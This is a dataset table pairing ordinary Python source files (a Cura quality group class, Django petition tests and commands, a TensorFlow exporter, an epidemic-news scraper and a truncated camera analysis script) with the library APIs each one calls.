| code (stringlengths 22 to 1.05M) | apis (listlengths 1 to 3.31k) | extract_api (stringlengths 75 to 3.25M) |
|---|---|---|
# Copyright (c) 2018 Ultimaker B.V.
# Cura is released under the terms of the LGPLv3 or higher.
from typing import Dict, Optional, List
from PyQt5.QtCore import QObject, pyqtSlot
#
# A QualityGroup represents a group of containers that must be applied to each ContainerStack when it's used.
# Some concrete examples are Quality and QualityChanges: when we select quality type "normal", this quality type
# must be applied to all stacks in a machine, although each stack can have different containers. Using an Ultimaker 3
# as an example: suppose we choose quality type "normal"; the actual InstanceContainers on each stack may look
# as below:
# GlobalStack ExtruderStack 1 ExtruderStack 2
# quality container: um3_global_normal um3_aa04_pla_normal um3_aa04_abs_normal
#
# This QualityGroup is mainly used in quality and quality_changes to group the containers that can be applied to
# a machine, so when a quality/custom quality is selected, the container can be directly applied to each stack instead
# of looking them up again.
#
class QualityGroup(QObject):
def __init__(self, name: str, quality_type: str, parent = None):
super().__init__(parent)
self.name = name
self.node_for_global = None # type: Optional["QualityGroup"]
self.nodes_for_extruders = {} # type: Dict[int, "QualityGroup"]
self.quality_type = quality_type
self.is_available = False
@pyqtSlot(result = str)
def getName(self) -> str:
return self.name
def getAllKeys(self) -> set:
result = set()
for node in [self.node_for_global] + list(self.nodes_for_extruders.values()):
if node is None:
continue
result.update(node.getContainer().getAllKeys())
return result
def getAllNodes(self) -> List["QualityGroup"]:
result = []
if self.node_for_global is not None:
result.append(self.node_for_global)
for extruder_node in self.nodes_for_extruders.values():
result.append(extruder_node)
return result
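# --- Illustrative usage (not part of the original file) ---
# A minimal, hedged sketch of how a QualityGroup is assembled and queried;
# real groups are populated by Cura's quality manager with quality nodes.
if __name__ == "__main__":
    group = QualityGroup(name="Normal", quality_type="normal")
    group.is_available = True
    print(group.getName(), len(group.getAllNodes()))  # -> Normal 0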
|
[
"PyQt5.QtCore.pyqtSlot"
] |
[((1464, 1484), 'PyQt5.QtCore.pyqtSlot', 'pyqtSlot', ([], {'result': 'str'}), '(result=str)\n', (1472, 1484), False, 'from PyQt5.QtCore import QObject, pyqtSlot\n')]
|
from django.core.management import BaseCommand
from django.contrib.auth import get_user_model
from django.db.models import Prefetch, Q
from user.models import Recommender, Friendship, Recommendation
from user.recommendations.saver import RecommendationSaver
class Command(BaseCommand):
help = 'Generate recommendations for users'
def handle(self, *args, **kwargs):
# load users
users = get_user_model().objects.prefetch_related(
'automatic_classification',
'manual_classification',
'locations',
Prefetch('friends_set', queryset=Friendship.objects.filter(lunch_together=True)),
).all()
saver = RecommendationSaver()
generators = Recommender.objects.order_by('order').all()
for generator in generators:
for user in users:
print(user.email)
saver.save_recommendations(generator, user)
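# Illustrative invocation (not part of the original file): assuming this file
# lives at user/management/commands/generate_recommendations.py (hypothetical
# path), the command could also be triggered from code:
#
#   from django.core.management import call_command
#   call_command("generate_recommendations")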
|
[
"user.models.Recommender.objects.order_by",
"user.recommendations.saver.RecommendationSaver",
"django.contrib.auth.get_user_model",
"user.models.Friendship.objects.filter"
] |
[((686, 707), 'user.recommendations.saver.RecommendationSaver', 'RecommendationSaver', ([], {}), '()\n', (705, 707), False, 'from user.recommendations.saver import RecommendationSaver\n'), ((729, 766), 'user.models.Recommender.objects.order_by', 'Recommender.objects.order_by', (['"""order"""'], {}), "('order')\n", (757, 766), False, 'from user.models import Recommender, Friendship, Recommendation\n'), ((414, 430), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (428, 430), False, 'from django.contrib.auth import get_user_model\n'), ((604, 650), 'user.models.Friendship.objects.filter', 'Friendship.objects.filter', ([], {'lunch_together': '(True)'}), '(lunch_together=True)\n', (629, 650), False, 'from user.models import Recommender, Friendship, Recommendation\n')]
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exporters for tf.estimator training."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
from language.common.utils import file_utils
import tensorflow as tf
class BestSavedModelAndCheckpointExporter(tf.estimator.BestExporter):
"""Exporter that saves the best SavedModel and checkpoint."""
def __init__(self,
eval_spec_name,
serving_input_receiver_fn,
compare_fn=None,
metric_name=None,
higher_is_better=True):
"""Creates an exporter that compares models on the given eval and metric.
While the SavedModel is useful for inference, the checkpoint is useful for
warm-starting another stage of training (e.g., fine-tuning).
Args:
eval_spec_name: Name of the EvalSpec to use to compare models.
serving_input_receiver_fn: Callable that returns a ServingInputReceiver.
compare_fn: Callable that compares eval metrics of two models. See
tf.estimator.BestExporter for details on the expected API. Specify
either this or `metric_name`.
metric_name: Name of the eval metric to use to compare models. Specify
either this or `compare_fn`.
higher_is_better: Whether higher or lower eval metric values are better.
Only used when `metric_name` is specified.
"""
self._metric_name = metric_name
def _default_compare_fn(best_eval_result, current_eval_result):
"""Returns True if the current metric is better than the best metric."""
if higher_is_better:
return current_eval_result[metric_name] > best_eval_result[metric_name]
else:
return current_eval_result[metric_name] < best_eval_result[metric_name]
super(BestSavedModelAndCheckpointExporter, self).__init__(
name="best_%s" % eval_spec_name,
serving_input_receiver_fn=serving_input_receiver_fn,
event_file_pattern="eval_%s/*.tfevents.*" % eval_spec_name,
compare_fn=compare_fn or _default_compare_fn)
def export(self, estimator, export_path, checkpoint_path, eval_result,
is_the_final_export):
"""Implements Exporter.export()."""
# Since export() returns None if export was skipped, we can use this to
# detect when the current model is the new best model.
exported_dir = super(BestSavedModelAndCheckpointExporter, self).export(
estimator=estimator,
export_path=export_path,
checkpoint_path=checkpoint_path,
eval_result=eval_result,
is_the_final_export=is_the_final_export)
if exported_dir is None:
return None # best model unchanged
checkpoint_dir = os.path.join(export_path, "checkpoint")
tf.logging.info("Saving new best checkpoint to %s", checkpoint_dir)
file_utils.make_empty_dir(checkpoint_dir)
file_utils.copy_files_to_dir(
source_filepattern=checkpoint_path + ".*", dest_dir=checkpoint_dir)
# Also save the new best metrics.
all_metrics = "".join(
" %r: %r,\n" % (name, metric)
for name, metric in sorted(self._best_eval_result.items()))
file_utils.set_file_contents(
data="{\n" + all_metrics + "}\n",
path=os.path.join(export_path, "all_metrics.txt"))
file_utils.set_file_contents(
data="%d %r\n" % (self._best_eval_result["global_step"],
self._best_eval_result[self._metric_name]),
path=os.path.join(export_path, "best_metric.txt"))
file_utils.set_file_contents(
data=exported_dir + "\n",
path=os.path.join(export_path, "best_saved_model.txt"))
return exported_dir
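# --- Illustrative wiring (not part of the original file) ---
# A hedged sketch of attaching this exporter to estimator training;
# `receiver_fn` and `eval_input_fn` are hypothetical callables:
#
#   exporter = BestSavedModelAndCheckpointExporter(
#       eval_spec_name="default",
#       serving_input_receiver_fn=receiver_fn,
#       metric_name="accuracy")
#   eval_spec = tf.estimator.EvalSpec(
#       input_fn=eval_input_fn, name="default", exporters=exporter)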
|
[
"language.common.utils.file_utils.copy_files_to_dir",
"tensorflow.logging.info",
"language.common.utils.file_utils.make_empty_dir"
] |
[((3365, 3432), 'tensorflow.logging.info', 'tf.logging.info', (['"""Saving new best checkpoint to %s"""', 'checkpoint_dir'], {}), "('Saving new best checkpoint to %s', checkpoint_dir)\n", (3380, 3432), True, 'import tensorflow as tf\n'), ((3437, 3478), 'language.common.utils.file_utils.make_empty_dir', 'file_utils.make_empty_dir', (['checkpoint_dir'], {}), '(checkpoint_dir)\n', (3462, 3478), False, 'from language.common.utils import file_utils\n'), ((3483, 3583), 'language.common.utils.file_utils.copy_files_to_dir', 'file_utils.copy_files_to_dir', ([], {'source_filepattern': "(checkpoint_path + '.*')", 'dest_dir': 'checkpoint_dir'}), "(source_filepattern=checkpoint_path + '.*',\n dest_dir=checkpoint_dir)\n", (3511, 3583), False, 'from language.common.utils import file_utils\n')]
|
import unittest
from distutils.version import StrictVersion
from mopidy import __version__
class VersionTest(unittest.TestCase):
def test_current_version_is_parsable_as_a_strict_version_number(self):
StrictVersion(__version__)
|
[
"distutils.version.StrictVersion"
] |
[((215, 241), 'distutils.version.StrictVersion', 'StrictVersion', (['__version__'], {}), '(__version__)\n', (228, 241), False, 'from distutils.version import StrictVersion\n')]
|
"""
Author: <NAME> (@zujko)
Author: <NAME> (@chrislemelin)
Description: Tests for petition operations.
Date Created: Sept 15 2016
Updated: Feb 17 2017
"""
from datetime import timedelta
from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.test.client import RequestFactory
from django.utils import timezone
from petitions.models import Petition, Response, Tag, Update
from .consumers import serialize_petitions
from .views import (PETITION_DEFAULT_BODY, PETITION_DEFAULT_TITLE, edit_check,
get_petition, petition_edit, petition_sign)
class PetitionTest(TestCase):
def setUp(self):
self.client = Client()
self.factory = RequestFactory()
self.superUser = User.objects.create_user(
username='txu1267', email='txu1267', is_staff=True)
self.superUser.set_password('<PASSWORD>')
self.superUser.save()
self.superUser2 = User.objects.create_user(
username='txu1266', email='txu1266', is_superuser=True)
self.superUser2.set_password('<PASSWORD>')
self.superUser2.save()
self.user = User.objects.create_user(
username='axu7254', email='axu7254')
self.user2 = User.objects.create_user(
username='cxl1234', email='cxl1234')
self.user3 = User.objects.create_user(
username='abc4321', email='abc4321')
self.tag = Tag(name='Test')
self.tag.save()
self.petition = Petition(title='Test petition',
description='This is a test petition',
author=self.user,
created_at=timezone.now(),
status=0,
expires=timezone.now() + timedelta(days=30)
)
self.petition.save()
self.petition.tags.add(self.tag)
self.petitionPublished = Petition(title='Test petition Published',
description='This is a test petition Published',
author=self.user2,
created_at=timezone.now(),
status=1,
expires=timezone.now() + timedelta(days=30)
)
self.petitionPublished.save()
def test_about_page(self):
response = self.client.get('/about/')
assert response.status_code == 200
self.assertTemplateUsed(response, 'about.html')
def test_maintenance_page(self):
response = self.client.get('/maintenance/')
assert response.status_code == 200
self.assertTemplateUsed(response, 'Something_Special.html')
def test_index_page(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'index.html')
def test_404(self):
response = self.client.get('/doesnotexist')
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, '404.html')
def test_petition_edit(self):
self.client.force_login(self.superUser)
# Change petition title to 'New'
obj = {
"attribute": "title",
"value": "New"
}
response = self.client.post(
'/petition/update/' + str(self.petition.id), obj)
# Check that it doesn't 404
self.assertNotEqual(response.status_code, 404)
# Check that petition was actually changed
pet = Petition.objects.get(pk=self.petition.id)
self.assertEqual(pet.title, 'New')
def test_petition_publish(self):
self.client.force_login(self.user)
tag = Tag(name='test tag')
tag.save()
obj = {
"attribute": "publish",
"value": "foo"
}
self.petition.status = 0
self.petition.tags.add(tag)
self.petition.save()
request = self.factory.post(
'/petition/update/' + str(self.petition.id), obj)
request.META['HTTP_HOST'] = 'localhost'
request.user = self.user
response = petition_edit(request, self.petition.id)
# Make sure there is no 404
self.assertNotEqual(response.status_code, 404)
# Check that petition was published
pet = Petition.objects.get(pk=self.petition.id)
self.assertEqual(pet.status, 1)
def test_sign_petition(self):
self.client.force_login(self.superUser)
response = self.client.post(
'/petition/sign/' + str(self.petitionPublished.id), {'test': 'test'})
pet = Petition.objects.get(pk=self.petitionPublished.id)
self.assertEqual(pet.signatures, 1)
self.assertEqual(response.status_code, 200)
def test_petition_subscribe(self):
self.client.force_login(self.user)
user = User.objects.get(pk=self.user.id)
self.assertEqual(user.profile.subscriptions.filter(
pk=self.petition.id).exists(), False)
response = self.client.post(
'/petition/subscribe/' + str(self.petition.id), {})
user = User.objects.get(pk=self.user.id)
self.assertEqual(user.profile.subscriptions.filter(
pk=self.petition.id).exists(), True)
def test_petition_unsubscribe(self):
self.client.force_login(self.user)
user = User.objects.get(pk=self.user.id)
self.assertEqual(user.profile.subscriptions.filter(
pk=self.petition.id).exists(), False)
response = self.client.post(
'/petition/subscribe/' + str(self.petition.id), {})
user = User.objects.get(pk=self.user.id)
self.assertEqual(user.profile.subscriptions.filter(
pk=self.petition.id).exists(), True)
response = self.client.post(
'/petition/unsubscribe/' + str(self.petition.id), {})
user = User.objects.get(pk=self.user.id)
self.assertEqual(user.profile.subscriptions.filter(
pk=self.petition.id).exists(), False)
def test_petition_unpublish(self):
self.client.force_login(self.superUser)
response = self.client.post(
'/petition/unpublish/' + str(self.petition.id))
self.assertEqual(response.status_code, 200)
pet = Petition.objects.get(pk=self.petition.id)
self.assertEqual(pet.status, 2)
# Test using not super user
self.client.force_login(self.user)
pet.status = 1
pet.save()
response = self.client.post(
'/petition/unpublish/' + str(self.petition.id))
pet = Petition.objects.get(pk=self.petition.id)
self.assertEqual(pet.status, 1)
def test_petition_page(self):
response = self.client.get('/petition/' + str(self.petition.id))
self.assertEqual(response.status_code, 200)
def test_url_redirect_fail(self):
self.client.force_login(self.user)
response = self.client.get('/petition/' + str(666))
self.assertEqual(response.status_code, 404)
def test_create_petition(self):
self.client.force_login(self.user)
response = self.client.post('/petition/create/')
self.assertEqual(response.status_code, 200)
userobj = User.objects.get(pk=self.user.id)
self.assertEqual(userobj.profile.petitions_signed.all()[
0].title, PETITION_DEFAULT_TITLE)
def test_check_edit(self):
self.client.force_login(self.user)
self.assertEqual(edit_check(self.user, self.petition), True)
self.assertEqual(edit_check(self.superUser, self.petition), True)
self.assertEqual(edit_check(self.superUser2, self.petition), False)
self.assertEqual(edit_check(self.user2, self.petition), False)
def test_serialize_petitions(self):
petitions = Petition.objects.all()
json_response = serialize_petitions(petitions)
# TODO: Improve this test to be more thorough
self.assertNotEqual(json_response, None)
def test_url_redirect(self):
self.client.force_login(self.user)
response = self.client.get('/petitions/' + str(self.petition.id))
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, '/?p='+str(self.petition.id),
status_code=302, target_status_code=200)
def test_edit_petition_description(self):
self.client.force_login(self.superUser)
obj = {
"attribute": "description",
"value": "test test test"
}
response = self.client.post(
'/petition/update/' + str(self.petition.id), obj)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petition.id)
self.assertEqual(pet.description, "test test test")
def test_petition_add_tag(self):
self.client.force_login(self.superUser)
tag = Tag(name='test tag2')
tag.save()
obj = {
"attribute": "add-tag",
"value": tag.id
}
response = self.client.post(
'/petition/update/' + str(self.petition.id), obj)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petition.id)
if tag not in pet.tags.all():
self.fail("tag not added")
def test_petition_remove_tag(self):
self.client.force_login(self.superUser)
tag = Tag(name='test tag2')
tag.save()
self.petition.tags.add(tag)
self.petition.save()
obj = {
"attribute": "remove-tag",
"value": tag.id
}
response = self.client.post(
'/petition/update/' + str(self.petition.id), obj)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petition.id)
if tag in pet.tags.all():
self.fail("tag not removed")
def test_petition_add_update(self):
self.client.force_login(self.superUser)
obj = {
"attribute": "add_update",
"value": "test update"
}
request = self.factory.post(
'/petition/update/' + str(self.petition.id), obj)
request.user = self.superUser
request.META['HTTP_HOST'] = "random"
response = petition_edit(request, self.petition.id)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petition.id)
fail = True
for update in pet.updates.all():
value = update.description
if value == "test update":
fail = False
if fail:
self.fail("did not add update")
def test_petition_add_response(self):
self.client.force_login(self.superUser)
obj = {
"attribute": "response",
"value": "test response"
}
request = self.factory.post(
'/petition/update/' + str(self.petition.id), obj)
request.user = self.superUser
request.META['HTTP_HOST'] = "random"
response = petition_edit(request, self.petition.id)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petition.id)
if pet.response.description != "test response":
self.fail()
def test_petition_mark_work_in_progress(self):
self.client.force_login(self.superUser)
obj = {
"attribute": "mark-in-progress"
}
self.assertEqual(self.petitionPublished.in_progress, None)
response = self.client.post(
'/petition/update/' + str(self.petitionPublished.id), obj)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petitionPublished.id)
self.assertEqual(pet.in_progress, True)
def test_petition_unpublish_progress(self):
self.client.force_login(self.superUser)
obj = {
"attribute": "unpublish"
}
self.assertEqual(self.petitionPublished.status, 1)
request = self.factory.post(
'/petition/update/' + str(self.petitionPublished.id), obj)
request.user = self.superUser
request.META['HTTP_HOST'] = "random"
response = petition_edit(request, self.petitionPublished.id)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petitionPublished.id)
self.assertEqual(pet.status, 2)
def test_get_petition(self):
self.client.force_login(self.superUser)
petition = get_petition(self.petition.id, self.user)
self.assertEqual(petition, self.petition)
def test_get_petition_fail(self):
self.client.force_login(self.superUser)
petition = get_petition(self.petition.id, self.user2)
self.assertEqual(petition, False)
def test_petition_str(self):
assert str(self.petition) == self.petition.title
def test_tag_str(self):
assert str(self.tag) == self.tag.name
def test_response_str(self):
resp = Response.objects.create(
description='Response', created_at=timezone.now(), author='Test Author')
assert str(resp) == 'Test Author'
|
[
"django.contrib.auth.models.User.objects.get",
"django.test.Client",
"petitions.models.Tag",
"django.utils.timezone.now",
"petitions.models.Petition.objects.get",
"django.contrib.auth.models.User.objects.create_user",
"django.test.client.RequestFactory",
"datetime.timedelta",
"petitions.models.Petition.objects.all"
] |
[((676, 684), 'django.test.Client', 'Client', ([], {}), '()\n', (682, 684), False, 'from django.test import Client, TestCase\n'), ((708, 724), 'django.test.client.RequestFactory', 'RequestFactory', ([], {}), '()\n', (722, 724), False, 'from django.test.client import RequestFactory\n'), ((750, 826), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""txu1267"""', 'email': '"""txu1267"""', 'is_staff': '(True)'}), "(username='txu1267', email='txu1267', is_staff=True)\n", (774, 826), False, 'from django.contrib.auth.models import User\n'), ((946, 1031), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""txu1266"""', 'email': '"""txu1266"""', 'is_superuser': '(True)'}), "(username='txu1266', email='txu1266', is_superuser=True\n )\n", (970, 1031), False, 'from django.contrib.auth.models import User\n'), ((1142, 1203), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""axu7254"""', 'email': '"""axu7254"""'}), "(username='axu7254', email='axu7254')\n", (1166, 1203), False, 'from django.contrib.auth.models import User\n'), ((1238, 1299), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""cxl1234"""', 'email': '"""cxl1234"""'}), "(username='cxl1234', email='cxl1234')\n", (1262, 1299), False, 'from django.contrib.auth.models import User\n'), ((1334, 1395), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""abc4321"""', 'email': '"""abc4321"""'}), "(username='abc4321', email='abc4321')\n", (1358, 1395), False, 'from django.contrib.auth.models import User\n'), ((1428, 1444), 'petitions.models.Tag', 'Tag', ([], {'name': '"""Test"""'}), "(name='Test')\n", (1431, 1444), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((3656, 3697), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (3676, 3697), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((3836, 3856), 'petitions.models.Tag', 'Tag', ([], {'name': '"""test tag"""'}), "(name='test tag')\n", (3839, 3856), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((4452, 4493), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (4472, 4493), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((4750, 4800), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petitionPublished.id'}), '(pk=self.petitionPublished.id)\n', (4770, 4800), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((4995, 5028), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (5011, 5028), False, 'from django.contrib.auth.models import User\n'), ((5255, 5288), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (5271, 5288), False, 'from django.contrib.auth.models import User\n'), ((5499, 5532), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (5515, 5532), False, 'from django.contrib.auth.models import User\n'), ((5759, 5792), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (5775, 5792), False, 'from django.contrib.auth.models import User\n'), ((6022, 6055), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (6038, 6055), False, 'from django.contrib.auth.models import User\n'), ((6418, 6459), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (6438, 6459), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((6733, 6774), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (6753, 6774), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((7376, 7409), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (7392, 7409), False, 'from django.contrib.auth.models import User\n'), ((7960, 7982), 'petitions.models.Petition.objects.all', 'Petition.objects.all', ([], {}), '()\n', (7980, 7982), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((8851, 8892), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (8871, 8892), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((9053, 9074), 'petitions.models.Tag', 'Tag', ([], {'name': '"""test tag2"""'}), "(name='test tag2')\n", (9056, 9074), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((9354, 9395), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (9374, 9395), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((9576, 9597), 'petitions.models.Tag', 'Tag', ([], {'name': '"""test tag2"""'}), "(name='test tag2')\n", (9579, 9597), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((9945, 9986), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (9965, 9986), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((10564, 10605), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (10584, 10605), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((11340, 11381), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (11360, 11381), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((11879, 11929), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petitionPublished.id'}), '(pk=self.petitionPublished.id)\n', (11899, 11929), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((12527, 12577), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petitionPublished.id'}), '(pk=self.petitionPublished.id)\n', (12547, 12577), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((1692, 1706), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1704, 1706), False, 'from django.utils import timezone\n'), ((2213, 2227), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (2225, 2227), False, 'from django.utils import timezone\n'), ((13289, 13303), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (13301, 13303), False, 'from django.utils import timezone\n'), ((1792, 1806), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1804, 1806), False, 'from django.utils import timezone\n'), ((1809, 1827), 'datetime.timedelta', 'timedelta', ([], {'days': '(30)'}), '(days=30)\n', (1818, 1827), False, 'from datetime import timedelta\n'), ((2331, 2345), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (2343, 2345), False, 'from django.utils import timezone\n'), ((2348, 2366), 'datetime.timedelta', 'timedelta', ([], {'days': '(30)'}), '(days=30)\n', (2357, 2366), False, 'from datetime import timedelta\n')]
|
# -*- coding:utf-8 -*-
# /usr/bin/env python
"""
Author: <NAME>
date: 2020/1/23 9:07
contact: <EMAIL>
desc: newly added event interfaces
newly added event interface: novel coronavirus data - NetEase (163)
newly added event interface: novel coronavirus data - DXY (dxy.cn)
"""
import json
import time
import requests
import pandas as pd
from bs4 import BeautifulSoup
def epidemic_163():
url = "https://news.163.com/special/epidemic/?spssid=93326430940df93a37229666dfbc4b96&spsw=4&spss=other&"
res = requests.get(url)
soup = BeautifulSoup(res.text, "lxml")
province_list = [item.get_text() for item in soup.find("ul").find_all("strong")]
desc_list = [item.get_text() for item in soup.find("ul").find_all("li")]
temp_df = pd.DataFrame([province_list, desc_list],
index=["地区", f"数据-{soup.find(attrs={'class': 'tit'}).find('span').get_text()}"]).T
return temp_df
def epidemic_dxy(indicator="data"):
url = "https://3g.dxy.cn/newh5/view/pneumonia"
params = {
"scene": "2",
"clicktime": int(time.time()),
"enterid": int(time.time()),
"from": "groupmessage",
"isappinstalled": "0",
}
res = requests.get(url, params=params)
res.encoding = "utf-8"
soup = BeautifulSoup(res.text, "lxml")
text_data_news = str(soup.find_all("script", attrs={"id": "getTimelineService"}))
temp_json = text_data_news[text_data_news.find("= {") + 2: text_data_news.rfind("}catch")]
json_data = pd.DataFrame(json.loads(temp_json)["result"])
desc_data = json_data[["title", "summary", "infoSource", "provinceName", "sourceUrl"]]
text_data_news = str(soup.find_all("script", attrs={"id": "getListByCountryTypeService1"}))
temp_json = text_data_news[text_data_news.find("= [{") + 2: text_data_news.rfind("catch") - 1]
json_data = pd.DataFrame(json.loads(temp_json))
data = json_data[['tags', 'provinceShortName']]
dig_data = data[['provinceShortName', 'tags']]
# text_data_news = str(soup.find_all("script")[6])
# temp_json = text_data_news[text_data_news.find("= {") + 2: text_data_news.rfind("}catch")]
# info_data = pd.DataFrame(json.loads(temp_json), index=[0]).T
if indicator == "data":
return dig_data
else:
return desc_data
if __name__ == '__main__':
epidemic_dxy_df = epidemic_dxy(indicator="data")
print(epidemic_dxy_df)
epidemic_163_df = epidemic_163()
print(epidemic_163_df)
|
[
"bs4.BeautifulSoup",
"json.loads",
"requests.get",
"time.time"
] |
[((388, 405), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (400, 405), False, 'import requests\n'), ((417, 448), 'bs4.BeautifulSoup', 'BeautifulSoup', (['res.text', '"""lxml"""'], {}), "(res.text, 'lxml')\n", (430, 448), False, 'from bs4 import BeautifulSoup\n'), ((1077, 1109), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (1089, 1109), False, 'import requests\n'), ((1148, 1179), 'bs4.BeautifulSoup', 'BeautifulSoup', (['res.text', '"""lxml"""'], {}), "(res.text, 'lxml')\n", (1161, 1179), False, 'from bs4 import BeautifulSoup\n'), ((1739, 1760), 'json.loads', 'json.loads', (['temp_json'], {}), '(temp_json)\n', (1749, 1760), False, 'import json\n'), ((947, 958), 'time.time', 'time.time', ([], {}), '()\n', (956, 958), False, 'import time\n'), ((984, 995), 'time.time', 'time.time', ([], {}), '()\n', (993, 995), False, 'import time\n'), ((1390, 1411), 'json.loads', 'json.loads', (['temp_json'], {}), '(temp_json)\n', (1400, 1411), False, 'import json\n')]
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import cv2
import numpy as np
import StringIO
import datetime
import pytz
import angus
import angus_display as ad
import stats as st
def f(stream_index, width, height):
camera = cv2.VideoCapture(stream_index)
camera.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, int(width))
camera.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, int(height))
camera.set(cv2.cv.CV_CAP_PROP_FPS, 10)
if not camera.isOpened():
print("Cannot open stream of index {}".format(stream_index))
exit(1)
print("Video stream is of resolution {} x {}".format(camera.get(3), camera.get(4)))
stats = st.Stats("stats.json")
animation = []
engaged = []
conn = angus.connect()
service = conn.services.get_service("scene_analysis", version=1)
service.enable_session()
while camera.isOpened():
ret, frame = camera.read()
if not ret:
break
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
ret, buff = cv2.imencode(".jpg", gray, [cv2.IMWRITE_JPEG_QUALITY, 80])
buff = StringIO.StringIO(np.array(buff).tostring())
t = datetime.datetime.now(pytz.utc)
job = service.process({"image": buff,
"timestamp" : t.isoformat(),
"camera_position": "facing",
"sensitivity": {
"appearance": 0.7,
"disappearance": 0.7,
"age_estimated": 0.4,
"gender_estimated": 0.5,
"focus_locked": 0.9,
"emotion_detected": 0.4,
"direction_estimated": 0.8
}
})
res = job.result
events = res["events"]
entities = res["entities"]
for idx, h in entities.iteritems():
